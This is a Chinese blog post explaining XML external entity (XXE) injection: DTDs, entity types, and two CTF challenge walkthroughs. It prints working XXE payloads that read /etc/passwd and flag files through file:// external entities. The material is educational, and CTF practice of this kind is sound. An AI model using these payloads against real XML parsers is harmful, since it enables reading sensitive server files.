XML外部实体注入(XXE)的原理和应用

已于 2023-04-04 11:13:38 修改
阅读量6.2k 收藏 22
点赞数 3
分类专栏: Web安全 CTF 文章标签: xml 安全
于 2020-08-27 22:16:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/108269451
版权

文章目录

XXE注入

XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。

一、XML简介

XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如:

<?xml version="1.0"?> <!--XML文档定义-->
<!DOCTYPE message [ <!--定义该文档为message类型-->
<!ELEMENT message(username,password)<!-- 定义message有两个元素-->
<!ELEMENT username(#PCDATA)> <!-- 定义username元素为#PCDATA类型 -->
<!ELEMENT password(#PCDATA)>
]>

上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素,后面的XML就要像如下的方式来书写。

<message>
    <username>root</username>
    <password>123</password>
</message>

二、XML实体

上面的<!ELEMENT>中定义的是元素,也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个变量,到时候可以在XML中通过&符号来引用。

XML可分为外部实体内部实体。首先来看内部实体:
示例:

<? xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY tst "test">
]>

其中元素定义的ANY说明接受任何元素,同时定义了一个xml实体(<! ENTITY>标签),这样就可以在XML文档中这样来写

<message>
<user>&tst;</user>
</message>

外部实体
示例:

<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
    <user>&xxe;</user>
</message>

这里用 &实体名; 引用实体,在DTD中定义,在XML文档中引用。

通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开,还可以分为通用实体参数实体

1.通用实体:

用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用

示例:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]
<Profile>
 <msg>&file;</msg>
</Profile>

2.参数实体

(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用

示例:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
%an-element; %remote-dtd;

三、CTF中XEE攻击

1.题目地址:Jarvis http://web.jarvisoj.com:32794/

打开链接,输入数据后抓包:

在这里插入图片描述
发现传的是JSON数据,考虑修改一下上传文件类型为XML类型。构造外部实体,实现XXE攻击。将ContentType字段改为:application/xml,然后在请求内容中加上如下的payload:

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file///etc/passwd">
]>
<message>&shell;</message>

在这里插入图片描述
发现了/home/ctf路径。改一下file的路径:file:///home/ctf/flag.txt。即可得到flag
在这里插入图片描述

2.题目地址:https://buuoj.cn/challenges (Fake XML cookbook)
在这里插入图片描述
抓包后,发现上传的是XML类型的数据
在这里插入图片描述
直接构造XML外部实体,读flag。payload如下:

<?xml version="1.0"?>
<!DOCTYPE user[
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>passwd</password></user>

在这里插入图片描述

参考文章
https://xz.aliyun.com/t/3357
https://www.freebuf.com/vuls/175451.html

XML实体注入
weixin_55190422的博客
09-25 544
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
34-XXEXML外部实体注入
XLbb的博客
05-19 1170
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XML外部实体注入概述+利用
最新发布
tengyuehou的博客
04-06 687
1. XXE全称为XML External Entity Injection,亦称XEE,当Web应用的脚本代码没有限制XML引入外部实体,导致用户可以插入一个外部实体,且其中的内容会被服务器端执行,就有可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害的出现。2. 其中XML全称为eXtensible Markup Language,可扩展性标记语言。主要用途是可以在不兼容的系统之间交换数据,利用XML,纯文本文件也可以用来存储数据。
Web Hacking 101 中文版 十四、XML 外部实体注入(一)
热门推荐
龙哥盟
03-25 3万+
十四、XML 外部实体注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 XML 外部实体XXE)漏洞涉及利用应用解析 XML 输入的方式,更具体来说,应用程序处理输入中外部实体的包含方式。为了完全理解理解如何利用,以及他的潜力。我觉得我们最好首先理解什么是 XML 外部实体。元语言是用于描述其它语言的语言,这就是 XML。它在 H
XML外部实体注入
2201_75572825的博客
08-16 1887
比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。其中,entity-name是参数实体的名称,entity-value 是参数实体的值。在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容。而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活易于维护。
XML外部实体注入(XXE)
web1的博客
09-08 576
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
网络安全-XXEXML外部实体注入原理、攻击及防御_c# 如何防止xml外部实体注入
2401_84266286的博客
05-04 694
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
网络安全-XXEXML外部实体注入原理、攻击及防御_c# 如何防止xml外部实体注入(1)
2401_84544752的博客
05-14 467
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
xml实体注入
HoAd'blog
02-01 485
xml实体注入 XXE漏洞即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 - XML被设计为传输存储数据,其焦点是数据的内容。 - HTML被设计用来显示数据,其焦点是数据的外观。 &lt &gt &amp &apos &
XXE详解-----XML实体注入
习惯积淀的博客
04-29 1797
XXE-----XML外部实体注入 XML简介 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML文档的构建模块 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成: 元素 属性 实体 PCDATA CDATA ...
XML 实体注入
YT的博客
04-02 6795
XML 的文档结构: XML 文档声明,在文档的第一行 XML 文档类型定义,即DTD,XXE 漏洞所在的地方 XML 文档元素 DTD 内部声明 DTD: <!DOCTYPE 根元素 [元素声明]> 引用外部 DTD: <!DOCTYPE 根元素 SYSTEM "文件名"> 或 <!DOCTYPE 根元素 PUBLIC "public_ID" "文件名"&g...
XML 外部实体注入
2201_75370376的博客
06-22 1179
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
漏洞之XML实体注入
shy的博客
06-30 2904
XXE——XML外部实体注入 程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 XML是可扩展标记语言,很类型HTML语言。 但是xml语言的标签没有预定义,需要自定义标签。 XML 被设计用来结构化、存储以及传输信息。但是 XML 不会做任何事情。 举个栗子:张三给李四写了一张便签,标题是提醒,内容是:李四,你不要忘记开会。 <note> <to>李四</to> <from>张三</from> <hea
XXE实体注入原理作用与具体操作
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 1053
XXE——实体注入 原理XXE=XML External Entity 即外部实体,即外部实体,从安全角度理解成XML External Entity attack XML 外部实体注入攻击 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 当XML允许引用外部实体时,通过构造恶意XML文档,根据建站语言使用不同的协议可导致读取任意文件内容、执行系统命令、探测内网端口、访问内网网站等危害。由于站点的建站语言不同,PHP、JA
利用 XML 外部实体注入
blacklordking的博客
06-21 481
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签结束标签,在开始标签结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体)
WebGoat (A4) XML External Entities (XXE)
箭雨镜屋
03-15 2719
第4页 这题要求用XXE注入罗列系统根目录。 首先在上图的输入框输入个评论,比如cute,按submit提交。 到burpsuite的proxy模块找到相关request报文,鼠标右键--send to repeater 从上图可见,<text></text>标签之前的内容是会显示在评论区的,因此如果在此处引用外部实体外部实体的内容也是可以显示在评论区的。 在request报文中的xml代码中增加DTD,并在其中定义外部实体root,其内容是"file:///",
【漏洞挖掘】——21、RPO漏洞挖掘攻防
Fly_鹏程万里
03-03 3242
Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段,其主要依赖于服务器浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
XML&XXE实体注入
q
06-18 986
转到pe_getxml用例可以看到,wechat_getxml调用了pe_getxml,相当于wechat_getxml调用了simplexml函数。使用CTRL+B快捷键转到wechat_getxml方法声明或用例,下面使用xml返回的数据都是固定的,应该是无回显。pe_getxml方法用到了simplexml,使用CTRL+B快捷键转到pe_getxml方法声明或用例。查看生成的file.txt,成功读取到c盘下123.txt。将get.php放入到服务器,将get.php放入到服务器,
XML外部实体注入--XML基础
qq_37107430的博客
01-21 1479
XML 即可扩展标记语言(Extensible Markup Language),用于标记电子文件,使其具有结构性。它是一种允许用户对自己的标记语言进行定义的源语言,可用来标记数据、定义数据类型。
XML外部实体注入XXE)漏洞详解
XXEXML External Entity Injection)漏洞是网络安全领域的一个重要话题,它出现在应用程序处理XML输入时未能正确限制外部实体的加载。XML是一种类似于HTML的语言,允许用户自定义标签来结构化数据。而XML External...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值